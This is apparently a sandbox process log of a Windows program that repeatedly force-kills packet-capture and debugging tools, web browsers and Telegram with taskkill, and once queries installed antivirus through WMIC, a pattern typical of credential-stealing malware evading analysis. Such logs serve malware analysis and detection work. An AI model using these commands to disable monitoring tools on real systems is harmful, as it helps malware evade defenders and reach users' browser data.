C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
